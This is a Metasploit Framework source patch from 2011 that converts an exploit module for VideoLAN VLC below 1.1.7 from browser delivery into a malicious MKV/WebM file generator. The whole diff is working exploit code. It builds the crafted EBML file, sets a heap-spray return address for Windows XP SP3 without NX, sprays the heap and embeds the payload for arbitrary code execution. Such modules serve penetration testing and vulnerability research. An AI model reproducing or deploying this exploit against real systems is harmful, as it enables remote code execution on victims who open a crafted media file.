From e06d4d52fefb4349bc73ced96fa08130b8f2bfcf Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 3 Feb 2011 18:16:40 +0000 Subject: [PATCH] convert VLC module to FileFormat, adjust spray git-svn-id: file:///home/svn/framework3/trunk@11705 4d416f70-5f16-0410-b530-b9f4589650da --- .../{browser => fileformat}/vlc_webm.rb | 55 ++++++++++--------- 1 file changed, 30 insertions(+), 25 deletions(-) rename modules/exploits/windows/{browser => fileformat}/vlc_webm.rb (73%) diff --git a/modules/exploits/windows/browser/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb similarity index 73% rename from modules/exploits/windows/browser/vlc_webm.rb rename to modules/exploits/windows/fileformat/vlc_webm.rb index 1ed9d81f44..87554f3b31 100644 --- a/modules/exploits/windows/browser/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, @@ -23,6 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. + + NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to + permanently enable NX support on machines that support it. As such, + This module will only work against systems that do not support NX or + are too old to have SetProcessDEPPolicy. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ], @@ -42,24 +47,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3', { 'Ret' => 0x05050505 } ], + [ 'Windows XP SP3 (w/o NX)', + { + 'Ret' => 0x04040404, # 0x6a954ff0, + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 31, 2011', 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.mkv']), + ], self.class) end - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - - return if ((p = regenerate_payload(cli)) == nil) + def exploit # EBML Header file = "\x1A\x45\xDF\xA3" # EBML @@ -101,21 +105,22 @@ class Metasploit3 < Msf::Exploit::Remote file << "\x01\xff\xff\xff" # This triggers our heap spray... file << [target.ret].pack('V') # Object address - # Spray the heap - file << ([target.ret].pack('V') * 0xa0000) - file << payload.encoded - file << ([target.ret].pack('V') * 0xa0000) - file << payload.encoded - file << ([target.ret].pack('V') * 0xa0000) - file << payload.encoded - file << ([target.ret].pack('V') * 0xa0000) - file << payload.encoded + # Spray some data + #block = Rex::Text.pattern_create(0x100000 - payload.encoded.length) + #block = "A" * (0x100000 - payload.encoded.length) + block = ([target.ret].pack('V') * (0x200000)) - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + 2.times { + block[0, 4] = "\x90" * 4 + block[4, 4] = "\x05" * 4 + #block[5426, 4] = [0xdeadbeef].pack('V') + file << block + file << payload.encoded + } - send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' }) + print_status("Creating '#{datastore['FILENAME']}' file ...") - handler(cli) + file_create(file) end end